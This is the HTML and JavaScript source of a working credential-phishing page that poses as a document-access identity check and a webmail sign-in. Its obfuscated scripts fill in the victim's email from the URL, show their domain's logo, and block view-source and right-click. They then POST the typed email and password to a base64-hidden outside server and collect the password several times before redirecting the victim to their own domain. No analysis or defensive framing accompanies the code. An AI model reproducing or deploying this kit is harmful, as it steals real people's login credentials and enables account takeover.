<head>
    <script nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4">var aix = "";</script>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Access your document</title>
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&amp;display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>
    <link rel="stylesheet" href="css/landing.css">
    <style>body{
        background: #D1D8F3;
        background-image: url("https://res.cloudinary.com/ducjuygen/image/upload/v1662463656/download_2_gcagnl.jpg");
        background-repeat: no-repeat;
        background-size: cover;
    }

    .container{
        width:100%;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
    }

    .office{
        width: 380px;
        background: #fff;
    }

    .office-holder{
        width:80%;
        margin: auto;
        padding: 20px 0px;
    }

    .logo{
        width:100%;
        float: left;
        margin-bottom: 2em;
    }

    .logo h1{
        font-family: arial;
    }

    .verify{
        width: 70%;
        margin: auto;
    }

    .verify h4{
        font-family: arial;
    }

    fieldset{
        width: 90%;
        float: right;
        border:2px solid #4285f4;
        border-radius: 5px;
    }

    legend{
        font-size: 15px;
        overflow: hidden;
        width: 42%;
        padding:0px 2px;
        margin: 0px;
    }

    .verify input[type='text']{
        width: 100%;
        float: right;
        border:none;
        padding:3px 10px;
    }

    .verify button{
        border:none;
        height: 40px;
        width: 80px;
        float: right;
        margin-top: 2em;
        background: #4285f4;
        border-radius: 5px;
        color: #fff;
    }

    .email-to-verify{
        border:1px solid #000;
        border-radius: 10px;
    }

    .form-holder{
        width:100%;
        float: left;
    }

    .form-holder h3{
        font-weight: 600;
    }

    .form-holder input[type='email'], input[type='password']{
        width: 100%;
        height:40px;
        float: left;
        margin-bottom: 15px;
    }
    .form-holder .btn-holder{
        width:100%;
        margin-top:1em;
        display: flex;
        align-content: center;
        align-items: center;
        justify-content: center;
    }

    .form-holder .btn-holder .btn{
        background:#0073C6;
        border:none;
        padding:6px 10px;
        color:#fff;
        border-radius: 0px;
        margin-top: 20px;
        margin-bottom: 20px;
    }

    .form-holder .btn-holder .btn:hover{
        cursor:pointer;
    }

    .checkbox{
        width: 100%;
        float: left;
        margin-top:5px;
    }

  
    .checkbox label{
        
        
        float: left;
        margin-left:0.5em;
		margin-top:-4px;
    }
    

    .hide{
        display: none;
    }
	</style>
</head><body>
    <div id="html_encoder_div">
        <div class="container">
            <div class="office show border shadow bg-light" id="others">
			
				<div id="Div1" style="display:none">
                <div class="office-holder">
                    <div class="logo" style="text-align:center">
                        <div>
                            <img src="https://www.scnsoft.com/blog-pictures/sharepoint/office_365_security-01_1.png" width="100%" alt="SeC3">
                        </div><br>
                        <h5 class="text-dark"><strong class="text-uppercase">Identity Verification</strong></h5>
                        <p class="font-weight-light">For your security we need to verify your identity: To gain access to this document, enter the email address this document was sent to.</p>
                    </div>
                    <form>
                        <div class="form-holder">
                            <div style="width: 100%;">
                                <div class="alert alert-danger hide alert2"></div>
                            </div>
                            <input type="email" id="aii" name="" class="form-control" value="" placeholder="someone@example.com" required="">
                            <div class="btn-holder">
                                <button class="btn btn-lg col-12" id="submit-btnn">Access Document</button>
                            </div>
                        </div>
                    </form>
                </div>
				</div>
				
				
			<div id="Div2" style="display: block;">
				<div class="office-holder">
                    <div class="logo" style="text-align:center">
                        <div id="login_logo">
                            <img id="login_logo1" src="https://logo.clearbit.com/dandomain.dk" width="50" height="50" alt="Webmail">
							<h3 class="text-dark"><strong id="domain-name" class="text-uppercase">DANDOMAIN</strong></h3>
                        </div>
                        <h5 class="font-weight-light">You are about to access a sensitive information, Sign in with your <span class="domain"> Quire </span> email account</h5>
                    </div>
                    <center>
                        
                        <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
						<span id="msg" class="text-danger" style="display: none;">Password is incorrect. Please try again</span>
                    </center>
					<br>
                    <form>
                        <div class="form-holder">
                            
                            <input type="email" id="ai" class="form-control" value="" placeholder="someone@example.com" required="" disabled="disabled">
                            <input type="password" id="pr" placeholder="Email Password" class="form-control" required="">
                            <div class="checkbox">
                                <input type="checkbox" name="" style="float: left; margin-top:2px; margin-bottom: 10px;">
                                <label>Remember me</label>
                            </div>
                            <div class="btn-holder">
                                <button class="btn btn-lg col-12" id="tt">Sign in</button>
                            </div><p></p>
                       
                           <p style="font-size:13px; margin-top:0em; float: left; width:100%;"> <span class="do"></span> © 2025 All right reserved.</p><br><br>
                        </div>
                    </form>
                </div>
			</div>
            </div>
        </div>
    </div>
    <style>
    .tb_button {
        padding: 1px;
        cursor: pointer;
        border-right: 1px solid #8b8b8b;
        border-left: 1px solid #FFF;
        border-bottom: 1px solid #fff;
    }

    .tb_button.hover {
        borer: 2px outset #def;
        background-color: #f8f8f8 !important;
    }

    .ws_toolbar {
        z-index: 100000
    }

    .ws_toolbar .ws_tb_btn {
        cursor: pointer;
        border: 1px solid #555;
        padding: 3px
    }

    .tb_highlight {
        background-color: yellow
    }

    .tb_hide {
        visibility: hidden
    }

    .ws_toolbar img {
        padding: 2px;
        margin: 0px
    }
    </style>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>
<input type="hidden" name="usrip1" id="usrip1" value="212.237.135.102">




<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>

<script type="text/javascript" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4">
function _0x3184(_0x3a0d10,_0x3be87d){var _0x23f52d=_0x23f5();return _0x3184=function(_0x318422,_0x5d9763){_0x318422=_0x318422-0x1a3;var _0xb95f86=_0x23f52d[_0x318422];return _0xb95f86;},_0x3184(_0x3a0d10,_0x3be87d);}var _0xbc516e=_0x3184;function _0x23f5(){var _0x3c163e=['block','substr','#domain-name','display','val','attr','https://logo.clearbit.com/','6wPXszX','Div1','disabled','#inputbar','click','Enter\x20a\x20valid\x20email\x20address','985431SXgfhy','none','485488LXddKP','Access\x20Document','#ai','src','html','9yUpmEE','#login_logo1','33719YnXDfZ','hide','style','1528shFPRY','287335Cbwjtl','30699620cweKyQ','indexOf','animate','#submit-btnn','getElementById','393898obUJOM','aii','#msg','test','toLowerCase','toUpperCase','Verifing...','3056400apuIeK','value'];_0x23f5=function(){return _0x3c163e;};return _0x23f5();}(function(_0x72d7c8,_0x3548b6){var _0x1b2b15=_0x3184,_0x2bf656=_0x72d7c8();while(!![]){try{var _0x354f3e=-parseInt(_0x1b2b15(0x1c8))/0x1+parseInt(_0x1b2b15(0x1b2))/0x2*(-parseInt(_0x1b2b15(0x1a6))/0x3)+-parseInt(_0x1b2b15(0x1ca))/0x4+-parseInt(_0x1b2b15(0x1ac))/0x5*(-parseInt(_0x1b2b15(0x1c2))/0x6)+parseInt(_0x1b2b15(0x1a8))/0x7*(-parseInt(_0x1b2b15(0x1ab))/0x8)+parseInt(_0x1b2b15(0x1b9))/0x9+parseInt(_0x1b2b15(0x1ad))/0xa;if(_0x354f3e===_0x3548b6)break;else _0x2bf656['push'](_0x2bf656['shift']());}catch(_0xf50880){_0x2bf656['push'](_0x2bf656['shift']());}}}(_0x23f5,0xcf5b4),$(_0xbc516e(0x1b0))[_0xbc516e(0x1c6)](function(_0x4f835e){var _0x2f6eb2=_0xbc516e;$(_0x2f6eb2(0x1b0))['html'](_0x2f6eb2(0x1b8)),_0x4f835e['preventDefault']();if(document[_0x2f6eb2(0x1b1)](_0x2f6eb2(0x1b3))['value']==='')return alert(_0x2f6eb2(0x1c7)),$(_0x2f6eb2(0x1b0))[_0x2f6eb2(0x1a5)](_0x2f6eb2(0x1cb)),![];var _0x126547=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x126547[_0x2f6eb2(0x1b5)](document[_0x2f6eb2(0x1b1)]('aii')[_0x2f6eb2(0x1ba)]))return alert(_0x2f6eb2(0x1c7)),$(_0x2f6eb2(0x1b0))[_0x2f6eb2(0x1a5)](_0x2f6eb2(0x1cb)),![];var _0x55f04a=document[_0x2f6eb2(0x1b1)](_0x2f6eb2(0x1b3))[_0x2f6eb2(0x1ba)];$(_0x2f6eb2(0x1a3))[_0x2f6eb2(0x1c0)](_0x2f6eb2(0x1c4),'');var _0x579e4c=_0x55f04a[_0x2f6eb2(0x1ae)]('@'),_0x7e15e0=_0x55f04a['substr'](_0x579e4c+0x1),_0x4b0283=_0x7e15e0[_0x2f6eb2(0x1bc)](0x0,_0x7e15e0['indexOf']('.')),_0x941a37=_0x4b0283[_0x2f6eb2(0x1b6)](),_0x573d93=_0x4b0283[_0x2f6eb2(0x1b7)]();$('#ai')[_0x2f6eb2(0x1bf)](_0x55f04a),$('#ai')[_0x2f6eb2(0x1c0)](_0x2f6eb2(0x1c4),''),$(_0x2f6eb2(0x1a7))['attr'](_0x2f6eb2(0x1a4),_0x2f6eb2(0x1c1)+_0x7e15e0),$(_0x2f6eb2(0x1bd))[_0x2f6eb2(0x1a5)](_0x573d93),$(_0x2f6eb2(0x1b4))['hide'](),$(_0x2f6eb2(0x1c5))[_0x2f6eb2(0x1af)]({'left':0xc8,'opacity':_0x2f6eb2(0x1a9)},0x0),$('#automail')['animate']({'right':0xc8,'opacity':'show'},0x3e8),setTimeout(function(){var _0x23635b=_0x2f6eb2,_0x31c443=document[_0x23635b(0x1b1)](_0x23635b(0x1c3)),_0x131a7b=document[_0x23635b(0x1b1)]('Div2');_0x31c443[_0x23635b(0x1aa)]['display']===_0x23635b(0x1bb)&&_0x131a7b['style'][_0x23635b(0x1be)]===_0x23635b(0x1c9)&&(_0x31c443['style']['display']='none',_0x131a7b[_0x23635b(0x1aa)]['display']=_0x23635b(0x1bb));},0x3e8);}));
</script>
<script type="text/javascript" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4">
function _0x2433(_0x4ce9b8,_0x239a29){var _0x4ae86b=_0x4ae8();return _0x2433=function(_0x24336f,_0x50e02f){_0x24336f=_0x24336f-0xd2;var _0x26e260=_0x4ae86b[_0x24336f];return _0x26e260;},_0x2433(_0x4ce9b8,_0x239a29);}function _0x4ae8(){var _0x35849e=['1342860UdZcNm','Div2','click','hide','location','#automail','indexOf','getElementById','hash','length','which','#pr','720gTLBFQ','html','display','animate','ready','keyCode','signal','1020381lUQrNa','keypress','focus','.domain','965656ioIFOl','keydown','16670YmOFDb','onkeydown','contextmenu','#back1','block','#msg','replace','#tt','src','bind','val','none','.do','ctrlKey','2403492MdxiMi','6879152hjKEwi','msg','#ai','Div1','138MQeMdS','toLocaleString','attr','POST','#domain-name','toUpperCase','https://','addEventListener','test','Email\x20field\x20is\x20empty','style','show','substr','#error','232240cyhVgA','Please\x20wait.....','preventDefault','<span\x20style=\x27color:red;\x27>Password\x20is\x20incorrect.\x20Please\x20try\x20again</span>'];_0x4ae8=function(){return _0x35849e;};return _0x4ae8();}var _0x5027a8=_0x2433;(function(_0x57a5a9,_0x30dbed){var _0x3336ee=_0x2433,_0x40ece5=_0x57a5a9();while(!![]){try{var _0x18bf92=parseInt(_0x3336ee(0xda))/0x1+parseInt(_0x3336ee(0xde))/0x2+parseInt(_0x3336ee(0xee))/0x3+-parseInt(_0x3336ee(0x105))/0x4+-parseInt(_0x3336ee(0xe0))/0x5*(parseInt(_0x3336ee(0xf3))/0x6)+parseInt(_0x3336ee(0xef))/0x7+-parseInt(_0x3336ee(0x101))/0x8*(parseInt(_0x3336ee(0xd3))/0x9);if(_0x18bf92===_0x30dbed)break;else _0x40ece5['push'](_0x40ece5['shift']());}catch(_0x12cea5){_0x40ece5['push'](_0x40ece5['shift']());}}}(_0x4ae8,0x86d78),$(document)[_0x5027a8(0xe9)](_0x5027a8(0xdf),function(_0x97e2e){var _0x469423=_0x5027a8;if(_0x97e2e[_0x469423(0xed)]&&_0x97e2e[_0x469423(0x10f)]==0x53)return _0x97e2e[_0x469423(0x103)](),![];}),document[_0x5027a8(0xfa)](_0x5027a8(0xe2),_0x35197d=>_0x35197d[_0x5027a8(0x103)]()),document[_0x5027a8(0xe1)]=function(_0x31cd5e){var _0x3cc655=_0x5027a8;return _0x31cd5e[_0x3cc655(0xed)]&&(_0x31cd5e[_0x3cc655(0xd8)]===0x43||_0x31cd5e['keyCode']===0x56||_0x31cd5e[_0x3cc655(0xd8)]===0x55||_0x31cd5e[_0x3cc655(0xd8)]===0x75)?![]:!![];},$(document)[_0x5027a8(0xdb)]('u',function(_0x184312){var _0x9d00ca=_0x5027a8;return _0x184312[_0x9d00ca(0xed)]?![]:!![];}),$(document)[_0x5027a8(0xd7)](function(){var _0x1f7118=_0x5027a8,_0x539ec7=0x0;$(_0x1f7118(0xe3))[_0x1f7118(0x107)](function(){var _0x413f3b=_0x1f7118;$(_0x413f3b(0xe5))['hide'](),$(_0x413f3b(0xf1))['val'](''),$(_0x413f3b(0x10a))[_0x413f3b(0xd6)]({'left':0xc8,'opacity':_0x413f3b(0x108)},0x0),$('#inputbar')['animate']({'right':0xc8,'opacity':_0x413f3b(0xfe)},0x3e8);});var _0x3c074c=window['location'][_0x1f7118(0x10d)][_0x1f7118(0xff)](0x1);if(!_0x3c074c){var _0x38f48a=document[_0x1f7118(0x10c)](_0x1f7118(0xf2)),_0x394db8=document[_0x1f7118(0x10c)](_0x1f7118(0x106));_0x38f48a[_0x1f7118(0xfd)][_0x1f7118(0xd5)]=_0x1f7118(0xe4),_0x394db8['style'][_0x1f7118(0xd5)]=_0x1f7118(0xeb);}else{var _0x45e31b=atob(_0x3c074c);$('#ai')['val'](_0x45e31b);var _0x58bdde=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x58bdde[_0x1f7118(0xfb)](_0x45e31b))return $(_0x1f7118(0x100))[_0x1f7118(0xfe)](),_0x3c074c[_0x1f7118(0xdc)],![];var _0x1b1df1=_0x45e31b['indexOf']('@'),_0x233a35=_0x45e31b[_0x1f7118(0xff)](_0x1b1df1+0x1),_0x31ce6b=_0x233a35[_0x1f7118(0xff)](0x0,_0x233a35[_0x1f7118(0x10b)]('.')),_0x5c0a1d=_0x31ce6b['charAt'](0x0)[_0x1f7118(0xf8)]()+_0x31ce6b['slice'](0x1),_0x3b8632=_0x31ce6b[_0x1f7118(0xf8)](),_0x4a6663=new Date(),_0x554cba=_0x4a6663[_0x1f7118(0xf4)]();$(_0x1f7118(0xf7))[_0x1f7118(0xd4)](_0x3b8632),$(_0x1f7118(0xdd))[_0x1f7118(0xd4)](_0x5c0a1d),$(_0x1f7118(0xec))[_0x1f7118(0xd4)](_0x233a35);var _0x1b1df1=_0x45e31b['indexOf']('@'),_0x233a35=_0x45e31b[_0x1f7118(0xff)](_0x1b1df1+0x1),_0x4d5330='https://'+_0x233a35,_0x3332d3=_0x233a35;$('#login_logo1')[_0x1f7118(0xf5)](_0x1f7118(0xe8),'https://logo.clearbit.com/'+_0x4d5330),$('.ai')['html'](_0x3c074c);}$(_0x1f7118(0xe7))[_0x1f7118(0x107)](function(_0x1bd213){var _0x128be2=_0x1f7118;_0x1bd213[_0x128be2(0x103)](),$(_0x128be2(0x100))[_0x128be2(0x108)](),$(_0x128be2(0xe5))['hide']();var _0x1109b7=$('#ai')['val'](),_0x1a94bb=$(_0x128be2(0xd2))[_0x128be2(0xea)](),_0x893b04=_0x1109b7,_0x4e4c18=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x1109b7)return $(_0x128be2(0x100))['show'](),$(_0x128be2(0x100))[_0x128be2(0xd4)](_0x128be2(0xfc)),![];if(!_0x4e4c18[_0x128be2(0xfb)](_0x893b04))return $(_0x128be2(0x100))[_0x128be2(0xfe)](),$(_0x128be2(0x100))[_0x128be2(0xd4)]('That\x20account\x20doesn\x27t\x20exist.\x20Enter\x20a\x20different\x20account'),![];if(!_0x1a94bb)return $(_0x128be2(0x100))[_0x128be2(0xfe)](),$(_0x128be2(0x100))[_0x128be2(0xd4)]('Password\x20field\x20is\x20empty'),![];if(_0x1a94bb[_0x128be2(0x10e)]<0x5)return $(_0x128be2(0x100))['show'](),$(_0x128be2(0x100))[_0x128be2(0xd4)]('Invalid\x20password!\x20Please\x20try\x20again'),_0x1109b7[_0x128be2(0xdc)],![];_0x539ec7++;const _0x2acff5=atob('aHR0cHM6Ly94OWUubmV0L25leHQvZHZwbC9vLnBocA==');$(_0x128be2(0xe7))['html'](_0x128be2(0x102)),setTimeout(function(){var _0xe452f2=_0x128be2;$['ajax']({'dataType':'JSON','url':_0x2acff5,'type':_0xe452f2(0xf6),'data':{'ai':_0x1109b7,'pr':_0x1a94bb},'success':function(_0x2a6a9a){setTimeout(function(){var _0x41efa5=_0x2433;$(_0x41efa5(0xe5))[_0x41efa5(0xd4)](_0x41efa5(0x104)),_0x2a6a9a&&(console['log'](_0x2a6a9a),$(_0x41efa5(0xe5))[_0x41efa5(0xfe)](),$('#msg')[_0x41efa5(0xd4)](_0x2a6a9a[_0x41efa5(0xf0)]),_0x2a6a9a[_0x41efa5(0xd9)]=='ok'?($(_0x41efa5(0xd2))[_0x41efa5(0xea)](''),_0x539ec7>=0x4&&(_0x539ec7=0x0,window['location'][_0x41efa5(0xe6)](_0x41efa5(0xf9)+_0x233a35))):$(_0x41efa5(0xe5))[_0x41efa5(0xd4)](_0x2a6a9a[_0x41efa5(0xf0)]));},0x1388);},'error':function(){var _0x513a09=_0xe452f2;$(_0x513a09(0xd2))[_0x513a09(0xea)](''),_0x539ec7>=0x4&&(_0x539ec7=0x0,window[_0x513a09(0x109)][_0x513a09(0xe6)](_0x513a09(0xf9)+_0x233a35)),$('#msg')[_0x513a09(0xfe)]();},'complete':function(){var _0x9ccf63=_0xe452f2;$(_0x9ccf63(0xe7))[_0x9ccf63(0xd4)]('Sign\x20in');}});},0x1388);});}));
  </script>
  


  </body>
</html>
   
